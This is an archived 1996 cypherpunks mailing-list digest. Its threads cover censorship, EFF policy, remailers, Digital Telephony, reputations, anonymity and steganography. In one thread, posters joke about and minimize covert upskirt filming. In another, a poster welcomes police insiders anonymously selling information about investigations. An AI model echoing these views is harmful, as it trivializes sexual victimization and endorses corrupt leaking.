<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK |AK| do you not understand? |=======
===================http://www.brainlink.org/~sunder/=========================

ActiveX! ActiveX! Format Hard drive? Just say yes!

From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 4 22:05:24 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Thu, 5 Sep 1996 13:05:24 +0800
Subject: ASEAN nations generally pro-censorship
Message-ID: <01I93H09FN2O9JDJT7@mbcl.rutgers.edu>

The interesting "cultural sovereignty" variation on the usual "national sovereignty" excuse for censorship and other such unethical actions. I'm reminded of another Asian state that used it... after Tiananmen Square.
At least one member (the Philippines) is making, at the minimum, lip service for freedom of speech. US control over them does appear to have done some good.
-Allen

> _________________________________________________________________
> The Peanut Roaster
> _________________________________________________________________
> ASEAN FORUM AGREES ON NEED TO POLICE THE NET
> __________________________________________________________________________
> Copyright © 1996 Nando.net
> Copyright © 1996 Reuter Information Service
> SINGAPORE (Sep 4, 1996 11:41 a.m. EDT) - Southeast Asian broadcasters
> and officials agreed on Wednesday to police the Internet and block off
> sites that run counter to Asian values.
> A statement issued at the close of the three-day Internet forum in
> Singapore also said there was a need for nations in the West to
> understand concerns about the Internet in the region.
> It said the meeting "affirmed the importance of having safeguards
> against easy access to sites which ran counter to our cherished
> values, traditions and culture. ASEAN would encourage other nations,
> especially the West to understand its concern."
> The Association of Southeast Asian Nations (ASEAN) groups Brunei,
> Malaysia, Singapore, Indonesia, the Philippines, Thailand and Vietnam.
> Earlier this year, ASEAN information ministers met in Singapore to
> discuss the darker side of the information technology revolution and
> agreed to set up a regulatory body to oversee the Internet invasion.
[...]
> But the statement suggested there was no agreement on a uniform
> approach to policing the Internet.
> The ASEAN officials had agreed that regulatory frameworks would depend
> on each country, and said they would continue to meet regularly "to
> help each country formulate and fine tune its regulatory approaches,"
> it said.
> Policing of the Net in ASEAN varies from Singapore's stance of strict
> controls by licensing only three Internet service providers who have
> to screen all material accessed by clients.
> Other ASEAN members encourage more self-regulation, and the
> Philippines says freedom of speech is a critical factor.
> "Political control would not be on the Philippines' agenda," Glenn
> Sipin, deputy executive director of the Philippines Council for
> Advanced Science and Technology, told Reuters at the start of the
> conference.
> Copyright © 1996 Nando.net

From snow at smoke.suba.com Wed Sep 4 22:15:02 1996
From: snow at smoke.suba.com (snow)
Date: Thu, 5 Sep 1996 13:15:02 +0800
Subject: What is the EFF doing exactly?
In-Reply-To:
Message-ID:

On Wed, 4 Sep 1996, Black Unicorn wrote:

> [This will be my last comment on this thread.]
> On Tue, 3 Sep 1996, Vladimir Z. Nuri wrote:
> > >I would put forth that you know nothing of my efforts, and therefore are
> > infantry will experience. if you expect unadulterated success,
> > you're not living in the same reality everyone else around here
> > is.
>
> If you're going to ask me for money and support, you damn well better
> produce unadulterated success.

I disagree with this. No one produces unadulterated success. Ever. You win some, you lose some. As long as you fight as hard as possible, and DO NOT COMPROMISE, then that is enough.

Other than that, I concur.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From jgrasty at gate.net Wed Sep 4 22:18:53 1996
From: jgrasty at gate.net (Joey Grasty)
Date: Thu, 5 Sep 1996 13:18:53 +0800
Subject:
Message-ID: <199609050231.WAA36740@osceola.gate.net>

Bugged:

> Subject: How to send bogus mail to mislead traffic analysis?
>
> Hi
>
> How can I send messages to remailer so that they will get lost?
> I want to generate a more or less steady flow of remailer-processed, encrypted mail.
>
> Can I send to nobody at some_remailer.net?
> What are the guidelines for that?
> What are the best remailers to send to?
>
> Cheers
>
> Bugged

Set your final destination to "null:", e.g.

==============================
::
Request-Remailing-To: null:

This message gets trashed.
==============================

This works for mixmaster remailers, WinSock Remailer, and probably most other cypherpunk remailers.

Regards,

--
Joey Grasty
jgrasty at gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty at pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13 93 F4 C9 06 89 51 F5 A7

From andrew_loewenstern at il.us.swissbank.com Wed Sep 4 22:19:54 1996
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Thu, 5 Sep 1996 13:19:54 +0800
Subject: How to send bogus mail to mislead traffic analysis?
In-Reply-To: <19960904203437.2587.qmail@squirrel.owl.de>
Message-ID: <9609050225.AA00649@ch1d157nwk>

an anonymous squirrel wrote:

> How can I send messages to remailer so that they will get
> lost? I want to generate a more or less steady flow of
> remailer-processed, encrypted mail.

The single best way to generate a steady flow of encrypted remailer-processed mail for the purpose of disguising your own personal remail is to operate a publicly accessible remailer from your own account. This offers many advantages:

1. encrypted remail is (more or less, depending on traffic) constantly flowing from your account: the addition of your own remail traffic will not raise any more flags.

2. there is always at least one remailer in your chain you can trust: yours. This means you never have to worry about compromised remailers.

3. if your mailings are traced back to your account, operating a remailer gives you more 'plausible deniability' than if you weren't...

4. if remailers start charging for service, you not only would continue to enjoy free remailing, but you could possibly make money...

5. you aren't likely to get blacklisted from your own remailer...

6. you get to read the complaints generated by your own messages (is this the cyberspatial equivalent to "doing it just to see their expression" ......???)

7. you could get your picture on the front-page of a British tabloid...

...to name a few....

andrew

From paul at fatmans.demon.co.uk Wed Sep 4 22:34:13 1996
From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk)
Date: Thu, 5 Sep 1996 13:34:13 +0800
Subject: desubscribe
Message-ID: <841849147.2513.0@fatmans.demon.co.uk>

> desubscribe

I`m sorry I can`t allow that

Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From declan at eff.org Wed Sep 4 22:49:50 1996
From: declan at eff.org (Declan McCullagh)
Date: Thu, 5 Sep 1996 13:49:50 +0800
Subject: Digital Telephony and the Net
In-Reply-To: <9609042054.AB16740@anchor.ho.att.com>
Message-ID:

It's late and I'm about to go home, but my search through the text of the Digital Telephony legislation comes up with the attached definitions the law uses.

If I were, say, Jason "The Weasel" Baron (who's my fave DoJ attorney) and I wanted to really screw over some netizens, I might try to argue that an ISP should be a "telecommunications carrier."

If the FCC bought my argument and thought that an ISP could in some cases substantially replace telephone service, then DT would apply to ISPs.
Then ISPs must -- at the request of "authorized" Feds acting even without a warrant -- cough up all data coming to and from a person on their system.

I'm probably wrong here and I hope I am, so I'm copying this to Marc who can point out the holes in my reasoning.

-Declan

// declan at eff.org // I do not represent the EFF // declan at well.com //

(4) The term `electronic messaging services' means software-based services that enable the sharing of data, images, sound, writing, or other information among computing devices controlled by the senders or recipients of the messages.

(6) The term `information services'--
    (A) means the offering of a capability for generating, acquiring, storing, transforming, processing, retrieving, utilizing, or making available information via telecommunications; and
    (B) includes--
        (i) a service that permits a customer to retrieve stored information from, or file information for storage in, information storage facilities;
        (ii) electronic publishing; and
        (iii) electronic messaging services; but

(8) The term `telecommunications carrier'--
    [...]
        (ii) a person or entity engaged in providing wire or electronic communication switching or transmission service to the extent that the Commission finds that such service is a replacement for a substantial portion of the local telephone exchange service and that it is in the public interest to deem such a person or entity to be a telecommunications carrier for purposes of this title; but
    (C) does not include--
        (i) persons or entities insofar as they are engaged in providing information services; and
        (ii) any class or category of telecommunications carriers that the Commission exempts by rule after consultation with the Attorney General.

SEC. 103. ASSISTANCE CAPABILITY REQUIREMENTS.
(a) Capability Requirements: Except as provided in subsections (b), (c), and (d) of this section and sections 108(a) and 109(b) and (d), a telecommunications carrier shall ensure that its equipment, facilities, or services that provide a customer or subscriber with the ability to originate, terminate, or direct communications are capable of-- (1) expeditiously isolating and enabling the government, pursuant to a court order or other lawful authorization, to intercept, to the exclusion of any other communications, all wire and electronic communications carried by the carrier within a service area to or from equipment, facilities, or services of a subscriber of such carrier concurrently with their transmission to or from the subscriber's equipment, facility, or service, or at such later time as may be acceptable to the government; From deviant at pooh-corner.com Wed Sep 4 23:06:40 1996 From: deviant at pooh-corner.com (The Deviant) Date: Thu, 5 Sep 1996 14:06:40 +0800 Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail In-Reply-To: Message-ID: On Wed, 4 Sep 1996, Declan McCullagh wrote: > He said the man was detected by two couples who noticed him moving his > foot under the skirt of a woman. They followed the man, held him and > called police. > > Police ask women who feel they've been victimized to call 808-5289. > > George Walter Campbell, 62, of Cornwall, has been charged with sexual > assault and mischief. He returns to College Park court on Sept. 10. > He was released on $750 cash bail yesterday. > Hrmm.. I can see how its _wrong_, but exactly how is looking under somebodies skirt _assault_? --Deviant "Obviously, a major malfunction has occurred." -- Steve Nesbitt, voice of Mission Control, January 28, 1986, as the shuttle Challenger exploded within view of the grandstands. From jfricker at vertexgroup.com Wed Sep 4 23:10:52 1996 From: jfricker at vertexgroup.com (John F. 
Fricker) Date: Thu, 5 Sep 1996 14:10:52 +0800 Subject: Mail OnNet Message-ID: <2.2.32.19960905032606.0074c024@vertexgroup.com> At 09:06 AM 9/4/96 -0700, Alan Olsen wrote: >At 05:10 PM 8/31/96 -0700, Joel McNamara wrote: > >>Two notes. (1) It only runs under Win95 and NT. (2) It's ITAR restricted. > >(3) It is bigger than a battleship. The distribution is just shy of 10 >megs. Installed it is supposed to be about 45 megs. (In perspective, a >full install of Visual Basic 4.0 "Professional" is about 50 megs.) >--- The install is only 5MBs. Part of that 10MB package is a silly collection of netscape plugins which don't have to be installed. I guess they could be nice if I tried them. It also only works on NT4 regardless of what the web page says. With its ability to run a program on receiving an email based upon filter criteria the possibilities are endless. (I know I know old hat for unix but so whiz bang for NTnoids like me.) --j From stewarts at ix.netcom.com Wed Sep 4 23:14:05 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 5 Sep 1996 14:14:05 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age Message-ID: <199609050327.UAA06817@dfw-ix8.ix.netcom.com> At 06:13 PM 9/2/96 -0400, you wrote: >> (This was done by many of us during the Karla Homulka and Teale trial in ... >There is a big difference between the Canada situation and the Singapore >situation. In Canada the restrictions are temporary and stem from making >the right to a fair trial a higher priority than the right to free >speech. >It is a conflict of two competing individual liberties. No observer of ..... >The situation in Singapore is simply a corrupt government trying to >suppress >legitimate democratic discussion. The intention is not to protect an >individual's right to a fair trial, the intention is to restrict argument >permanently. The Karla Homulka case and other criminal trials aren't the only censorship in Canada - there are far more serious problems.
Zundel's problems (his legal ones, not just his moral ones) are well-known, as are the Dworkin/MacKinnon-inspired anti-pornography laws which Canada uses to censor lesbian bookstores and gay magazines. For the most part, other than sex and drugs, Canada's censorship is the pro-human-rights-politically-correct-liberal-hypocritical variety rather than the Singapore-style anti-human-rights-order-enforcing- politically-correct-dictatorship variety. But it's not only illegal to sell unapproved drugs in Canada, it's illegal to sell materials advocating drugs or their legalization, or of course information on how to make or grow drugs as well. (This helped Mark Emery get the capital to start his Hemp store in Vancouver by selling Cannabis magazines door-to-door :-) (It turns out that, since hemp seeds don't contain THC, they're not illegal in Canada, and hemp stores he's started or encouraged have sold enough seeds to grow more dope than Canada's police have confiscated in the last year or two. Mark openly violates the censorship laws, and his shop occasionally gets raided, and after the last bust they've decided he's a co-conspirator with everybody who's grown drugs using seeds or light bulbs bought from him, and they're playing a FUD game about whether to charge him with 8 life sentences, in under-5-year pieces....) Vancouver newspaper columnist Doug Collins gave a talk on censorship at an international libertarian conf. in BC recently, which Emery also spoke at. He knows the subject fairly well, since some of BC's censorship laws were written just for him. He's one of those anti-immigrant anti-Semitic* WW2-veteran curmudgeons who's got an editor who lets him write whatever he wants, and he offends a lot of people. 
In BC, and to some extent in the rest of Canada, you can be charged with human rights violations for disparaging ethnic and religious groups, and he's been tried and defended himself successfully for that, because Canada does have some limited protections for free speech in their Charter. So BC wrote a law that allows the BC human rights commission to fine people for human rights violations with just an administrative proceeding, not requiring a full-scale trial, and you generally can't get a jury in Canada for crimes with punishment less than 5 years in jail anyway. He hasn't been busted under the new law yet, but his publisher has spent about $30K in legal costs trying to make sure it doesn't happen. [*He knew better than to specifically say anything anti-Semitic while he was talking to us, but he referred to Jewish groups that oppose him in ways that implied he probably was.] And of course Canada has broadcasting licensing requirements that prevent people from starting radio and TV stations whenever they want to, plus a huge government broadcasting company, but they're not as limited as Singapore on that, and there are other countries with that problem. And of course they have silly language laws in Quebec, but they don't really limit what you can say as long as you say it in French (or Chinese or Vietnamese or just about anything except English and maybe Native languages.) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From whgiii at amaranth.com Wed Sep 4 23:16:57 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Thu, 5 Sep 1996 14:16:57 +0800 Subject: What is the EFF doing exactly? 
In-Reply-To: <199609042000.VAA00708@server.test.net> Message-ID: <199609050409.XAA28542@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In <199609042000.VAA00708 at server.test.net>, on 09/04/96 at 09:00 PM, Adam Back said: >If this is the case she needs to be _much_ more careful about what she >says in `personal' interviews. There seems to be a point being missed in this thread. :( This was not a 'personal' interview. The paper was not interested in Ms. Dyson's views on anonymity on the internet because she seemed like a nice person. The only reason she was interviewed is because of her position with the EFF as chairwoman. Ms. Dyson knows this, the reporter knows this, the paper knows this, and so should everyone else. Under such circumstances this interview should be seen as an 'official' statement from the chairwoman of the EFF. Trying to call this a 'personal' interview and not reflecting 'official' EFF policy is just plain old spin-doctoring. Ms. Dyson should have had more common sense than this. These statements made by her are akin to the chairman of Philip Morris saying that he believe that cigarette smoke cause cancer but that's just his opinion and not the 'official' company position on it. Who would believe it? How long would he still have his job after making such a statement? The EFF should make an official statement of their position on this issue and if it is not the same as Ms. Dyson's she should be removed from the board. IMHO this is to important of an issue for the EFF to try to ignore. - -- - ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. 
Finger whgiii at amaranth.com for PGP Key and other info - ----------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMi5aMo9Co1n+aLhhAQH+CwQAs/6nRK/jy2vUFIeWhmFIA0xCdf/m2Vgn SVyzMm6NTx8rVlJiluubkx3Au1t7/lb/KzzZJqt2ocbRUtc0XQUo0TQImqgY06/G 0OAiDYjgddGppUr+42yeHtWXUHK8vhYEgWeSfGS1msnYKchlcqZ16xzDmYVlfize ncf+FDLd+tE= =nOVA -----END PGP SIGNATURE----- From gsi at juno.com Wed Sep 4 23:24:36 1996 From: gsi at juno.com (Floyd W Odom) Date: Thu, 5 Sep 1996 14:24:36 +0800 Subject: GSI Message-ID: <19960904.200349.3230.3.GSI@juno.com> From: GSI Full-Name: Floyd W Odom To: Bugtraq Subject: GSI Message-ID: <19960904.195621.3230.0.GSI at juno.com> X-Status: Unsent X-Mailer: Juno 1.15 Dear Recipient, We at Galaxy Software would like to offer you a chance to buy software over the magic of e-mail. How it works is you can send us here at GSI(Galaxy Software Inc.) e-mail orders from our software list telling us that the check or money order is in the mail. To e-mail us just send a letter to GSI at JUNO.COM. For more information you can e-mail at: doom13 at juno.com.
1. CGW Game Pack
2. One must fall 2097
3. Descent 2
4. CD Sampler: Volume Two
5. Cannon Creative
6. Animation Festival
7. Duke Nukem 3D
8. Doom
9. World Atlas
10. Crime City
11. Airforce Combat
12. GT Personal Accounting
13. Wolfenstein 3D
14. Print Master Gold
15. Chaos
16. Wizardry
17. Corel 6
18. America Online 3.0
19. Power Chute Plus Demo
20. UPC Doctor
21. Epic Pinball: Enigma
22. Epic Pinball: Android
23. Epic Pinball: 1, 2, 3
24. Jazz Jackrabbit: Holiday Hare
25. Jazz Jackrabbit: All*
From gsi at juno.com Wed Sep 4 23:24:41 1996 From: gsi at juno.com (Floyd W Odom) Date: Thu, 5 Sep 1996 14:24:41 +0800 Subject: GSI Message-ID: <19960904.200214.3230.2.GSI@juno.com> From: GSI Full-Name: Floyd W Odom To: Bugtraq Subject: GSI Message-ID: <19960904.195621.3230.0.GSI at juno.com> X-Status: Unsent X-Mailer: Juno 1.15 Dear Recipient, We at Galaxy Software would like to offer you a chance to buy software over the magic of e-mail. How it works is you can send us here at GSI(Galaxy Software Inc.) e-mail orders from our software list telling us that the check or money order is in the mail. To e-mail us just send a letter to GSI at JUNO.COM. For more information you can e-mail at: doom13 at juno.com.
1. CGW Game Pack
2. One must fall 2097
3. Descent 2
4. CD Sampler: Volume Two
5. Cannon Creative
6. Animation Festival
7. Duke Nukem 3D
8. Doom
9. World Atlas
10. Crime City
11. Airforce Combat
12. GT Personal Accounting
13. Wolfenstein 3D
14. Print Master Gold
15. Chaos
16. Wizardry
17. Corel 6
18. America Online 3.0
19. Power Chute Plus Demo
20. UPC Doctor
21. Epic Pinball: Enigma
22. Epic Pinball: Android
23. Epic Pinball: 1, 2, 3
24. Jazz Jackrabbit: Holiday Hare
25. Jazz Jackrabbit: All*
From declan at well.com Wed Sep 4 23:38:49 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 5 Sep 1996 14:38:49 +0800 Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail In-Reply-To: Message-ID: On Wed, 4 Sep 1996, The Deviant wrote: > > On Wed, 4 Sep 1996, Declan McCullagh wrote: > > He said the man was detected by two couples who noticed him moving his > > foot under the skirt of a woman. They followed the man, held him and > > called police. > > > > Police ask women who feel they've been victimized to call 808-5289. > > > > George Walter Campbell, 62, of Cornwall, has been charged with sexual > > assault and mischief. He returns to College Park court on Sept. 10. > > He was released on $750 cash bail yesterday. > > > > Hrmm..
I can see how it's _wrong_, but exactly how is looking under > somebody's skirt _assault_? Why is this wrong? Information wants to be free! More to the point, boys used to put mirrors on their shoes. Now they learn about shoecams on the Net. Ah, to be young again. -Declan From tcmay at got.net Wed Sep 4 23:44:42 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 14:44:42 +0800 Subject: Reputations Message-ID: At 1:11 AM 9/5/96, Greg Burk wrote: >That part of the "reputation capital" theory has always seemed >suspicious to me. "reputation capital" doesn't behave linearly. There's >too much incentive to bottom-feed and too little incentive to shoot for >the heights. As an "asset", it is extremely non-liquid. It is hard to >spend it in a controlled manner. Sure, it isn't fungible, it isn't transitive, it isn't neat and clean. But it's the best thing we've got, imperfect as it is (and must be, I believe). >Too much incentive to bottom-feed: > >For example, let's say there's someone well-known who frequently speaks >nonsense on crypto issues. We'll call her "Norothy Nenning". She makes a >recommendation on some particular crypto issue, say "The government's >Nipper chip is a safe and effective form of crupto". Plenty of naive >people will credit her to some degree. True, fewer people than if she >had carefully husbanded her reputation, and to a lesser degree, but >still a lot more than zero. > >Notice that that's a zero cost/benefit ratio. She never does anything to >husband her reputation, she just spends it every chance she gets. And >while no single expenditure rewards her as much as it would if she made >the same expenditure with a good reputation, she spends so much more >freely that it is a good strategy for her on the whole. To stick with my restaurant example, consider _advertising_. MacDonald's and Burger King spend hundreds of millions of dollars every year claiming their "restaurants" are great. Many millions of people obviously are swayed. So?
Others choose not to trust the advice of the MacDonald's hucksters. Maybe only a tiny fraction choose Chez Panisse over MacDonald's. This is the way of the world. It's still the give and take of reputations. It ain't perfect (in that it doesn't produce results I believe are empirically valid and optimum :-}). But it's all we have. It's the market. The agora. >"Reputation capital" is hard to spend down to absolute 0 because it is >significant work to distinguish valid "reputation capital" from >worthless counterfeit, and it is easy to counterfeit... just talk. I strongly disagree. It's quite possible for Person A to quickly convert his reputation to Person B to a _negative_ value. Real quick, in fact. Perhaps my short article did not fully explain a few things. Reputations are a _tensor_ or _matrix_ quantity. Person A has a reputation R(A,B) to Person B, a reputation R(A,C) to Person C, and so on. (And the matrix may be further broken down into reputations for advice on various subjects, in various fields, etc.) We may lump a lot of folks together and say, for example, that MacDonald's has a reputation of R (MacDonald's, lots of people) = 0.7531. And perhaps R (Chez Panisse, lots of people) = 0.0013 (i.e., they don't know what it is, and so value the rep of Chez Panisse at near zero). And so on. Lots of examples could be given. Now suppose that J. Anonymous Gourmand announces that MacDonald's is shit. How much will anonymous claim hurt MacDonald's? Obviously, not much. But what if the American Heart Association publishes a detailed study on the fat levels of MacDonald's products and declares it to "Dangerous." The effect will probably be greater, as R (AHA, many people) = high, and by the kind of Dempster-Shafer belief calculus I discussed a few months ago, the rep of the AHA propagates semi-transitively to the rep of MacDonald's. 
(This all happened recently, with the famous studies of fat levels of movie theater food...sales dropped almost overnight, and now the fat levels of popcorn, etc., have been changed for the better.) This is a real example of how reputations matter, how negative and positive reps matter, etc. Note especially that the "identity" (in the Dyson sense of providing True Name accountability) of an opinion-giver is not what it is important...it is not the essence of why people believe or don't believe the opinions of others. (Some years ago on the CBS station in San Francisco, there was an "anonymous gourmet" who visited restaurants and gave reviews. His reviews were taken quite seriously, and his anonymity did not matter, provided his persona was _persistent_. That is, provided that people thought it was "the guy they had come to trust," and not, say, a guy the station recruited off the street each day and sent out as the "anonymous gourmet." In the case of this guy, his face was cloaked in shadows, but his voice was distinctive. (His voice on the show was probably different from his food-ordering voice, so restaurants would not know who was ordering and alter the food or service.) Much could be written about the role of anonymity in such reviews, in tests of service, etc.) >I anticipate the answer "Well, the work pays off". But that misses the >point. Frequently the work required to tell the good "reputation >capital" from the worthless is as much as would be required to find the >straight dope yourself. Reputations work OK for me in the real world. Given the limits on a lot of ontological facts, hard to see how it could be better. I've already spent too much time writing this, so I can't address the remainder of your points. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Wed Sep 4 23:49:09 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 14:49:09 +0800 Subject: Using Compromised Remailers to Get the Goods Message-ID: At 11:21 PM 9/4/96, jim bell wrote: >Perhaps the most ominous part of making "use of encryption to thwart an >investigation" illegal is _not_ that remailer operators might be prosecuted, >but that they might NOT be prosecuted in a deal where (in exchange for not >being prosecuted) they continue to operate the remailer, "cracked" or >sabotaged so that they share all the info with the cops. While even that >won't make chained remailers totally useless, eventually suspicions of such >a crack will surface, which will help sabotage the credibility of all >remailers, >not just the ones that have been "stung." A very valid concern. As Jim must be tired of hearing by now, this was brought up a couple of years ago in discussions about the pressure that could be brought to bear on remailers. One suggestion was a duress signal, effectively saying "I have been compromised." (Also known as a "wave off" in criminal circles.) The issue of whether a remailer can be trusted to wave off others, via covert channels, is of course another issue. One can hope that additional channels will be acquired to produce the necessary information. (For example, full sender untraceability means that sources within police departments can go home, log on with their own PCs, and sell information about pending investigations, modulo their concerns about pointing to themselves with information provided (see "canary traps"). What an exciting world we are entering.)
--Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From cme at cybercash.com Wed Sep 4 23:57:23 1996 From: cme at cybercash.com (Carl Ellison) Date: Thu, 5 Sep 1996 14:57:23 +0800 Subject: ZD Net Registration Message-ID: <322E5ADD.124@cybercash.com> http://community.zdnet.com/register/register.cgi Check this out! Harvesting Mother's Maiden Name. I wonder how many they get each hour.... From shabbir at vtw.org Thu Sep 5 00:02:05 1996 From: shabbir at vtw.org (Voters Telecommunications Watch) Date: Thu, 5 Sep 1996 15:02:05 +0800 Subject: ALERT: Join thousands of net users in their fight against the White House! (9/4/96) Message-ID: <199609050413.AAA03766@panix3.panix.com> ============================================================================= Crypto-News NET LUMINARIES JOIN THOUSANDS IN SIGNING PRO-ENCRYPTION PETITION http://www.crypto.com/petition/ CRYPTO ACTION WEEK ENDS WITH JUDICIARY HEARING ON HR 3011 (9/11/96) Date: September 4, 1996 URL:http://www.crypto.com/ crypto-news at panix.com If you redistribute this, please do so in its entirety, with the banner intact. ----------------------------------------------------------------------------- Table of Contents Introduction Join Phil Zimmermann, Bruce Schneier, and other cyber luminaries!
How to receive crypto-news Press contacts ----------------------------------------------------------------------------- INTRODUCTION This week is a hard week for many working on the encryption issue. The House pro-encryption bill, SAFE (HR 3011), will have a hearing in the Judiciary committee on September 11. Between now and then, individuals and industry representatives will be calling on their legislators to support HR 3011. On the other side of the issue, the White House is expected to release their "solution" to the encryption debate no earlier than September 8th. It will surprise no one if it is designed to be in the best interests of law enforcement with concerns for privacy placed dead last. Be a part of this assault on the White House by signing the pro-encryption petition at http://www.crypto.com/petition/ ----------------------------------------------------------------------------- JOIN PHIL ZIMMERMANN, BRUCE SCHNEIER, AND OTHER CYBER LUMINARIES! The following petition can be signed onto at http://www.crypto.com/petition/ The Information Revolution is being held hostage by an outdated, Cold War-era U.S. encryption policy. Current U.S. export controls and other initiatives are slowing the widespread availability of strong encryption products, endangering the privacy and security of electronic communications, harming the competitiveness of U.S. businesses, and threatening the future of electronic commerce and the growth of the Global Information Infrastructure (GII). We the undersigned Internet users and concerned citizens strongly support Congressional efforts to address this critical issue. Bills are currently pending in both Houses of Congress which would: -Relax export controls on encryption technology; -Prohibit the government from imposing "Key Escrow" solutions domestically; and -Recognize the importance of privacy and security for the future of electronic commerce, individual liberty, and the success of the Internet. 
We urge Congress to act NOW to enact a U.S. encryption policy that promotes electronic privacy and security. Join Phil Zimmermann, author of Pretty Good Privacy (PGP), Bruce Schneier, author of "Applied Cryptography", Dr. Matt Blaze of Tessera card fame, Phil Karn and Vince Cate as they pressure the White House to change their wrong-headed encryption policies. Add your name to theirs at http://www.crypto.com/petition/ ! ----------------------------------------------------------------------------- HOW TO RECEIVE CRYPTO-NEWS To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com) or send mail to majordomo at panix.com with "subscribe crypto-news" in the body of the message. To unsubscribe, send a letter to majordomo at panix.com with "unsubscribe crypto-news" in the body. ----------------------------------------------------------------------------- PRESS CONTACT INFORMATION Press inquiries on Crypto-News should be directed to Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir at vtw.org Jonah Seiger (CDT) at +1.202.637.9800 or jseiger at cdt.org ----------------------------------------------------------------------------- End crypto-news ============================================================================= From tcmay at got.net Thu Sep 5 00:12:11 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 15:12:11 +0800 Subject: Voluntary Disclosure of True Names Message-ID: In a rare moment of lucidity Vladimir Z. Dettweiler wrote: >I think cpunks should hold the view that communication is a matter >of mutual consent between sender and receiver. if a receiver says, >"I don't want any anonymous messages", then should be able to block them. But this is precisely what nearly all of us have been arguing. Namely, that the issue of anonymity vs. providing of True Names, is a matter of _contract_ between parties, not something the government is justified in sticking its nose into.
Those who wish to not deal with the entities they cannot reliably verify the True Name of are free to filter them out. All we are asking is that those of us happy to deal with S. Boxx, Black Unicorn, PrOduct Cypher, Pablo Escobar, and other pseudospoofing tentacles, not be told by a government that, for our own good, such communications are felonies. >the above is almost exactly what Dyson was saying, and I have been No, Dyson said "Therefore I would favor allowing anonymity -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." This implies a role for government, and concomitant restrictions on related anonymity technologies, to provide traceability. So much for mutual agreement between sender and recipient. (I have nothing against senders and recipients agreeing to use the services of some third party in providing ultimate traceability. I'm not wild about the U.S. Government being this third party, paid for by tax money, but so long as it is not required, it's a minor concern to me. I surmise, though, that use of the U.S. Government as a third party would not be optional, in the schemes of Dyson, Denning, and others of that ilk.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From makof at alias.cyberpass.net Thu Sep 5 00:40:14 1996 From: makof at alias.cyberpass.net (makofi) Date: Thu, 5 Sep 1996 15:40:14 +0800 Subject: Steganography -- Tell Tale Signs? Message-ID: <199609050421.VAA21428@sirius.infonex.com> Hi there! 
I'd appreciate some help from you experts in steganography. 1) If I hide some PGP encrypted data in a gif, jpg or wav file will there be any tell tale signs to the naked eye of an expert? If yes, what are they? 2) Would it be better to hide the data in a jpg with black and white image rather than a color one? 3) Are there any tools at the moment to expose (not crack) the hidden encrypted data? If none, are there tools in development? If this is off-topic please accept my apologies, and if necessary, please email replies to me directly. Thank you. Makofi From rwright at adnetsol.com Thu Sep 5 01:01:57 1996 From: rwright at adnetsol.com (Ross Wright) Date: Thu, 5 Sep 1996 16:01:57 +0800 Subject: Voluntary Disclosure of True Names Message-ID: <199609050545.WAA18030@adnetsol.adnetsol.com> On Or About: 4 Sep 96 at 21:48, Timothy C. May wrote: > In a rare moment of lucidity Vladimir Z. Dettweiler wrote: > > >I think cpunks should hold the view that communication is a matter > >of mutual consent between sender and receiver. if a receiver says, > >"I don't want any anonymous messages", then should be able to block them. > > But this is precisely what nearly all of us have been arguing. Namely, that > the issue of anonymity vs. providing of True Names, is a matter of > _contract_ between parties, not something the government is justified in > sticking its nose 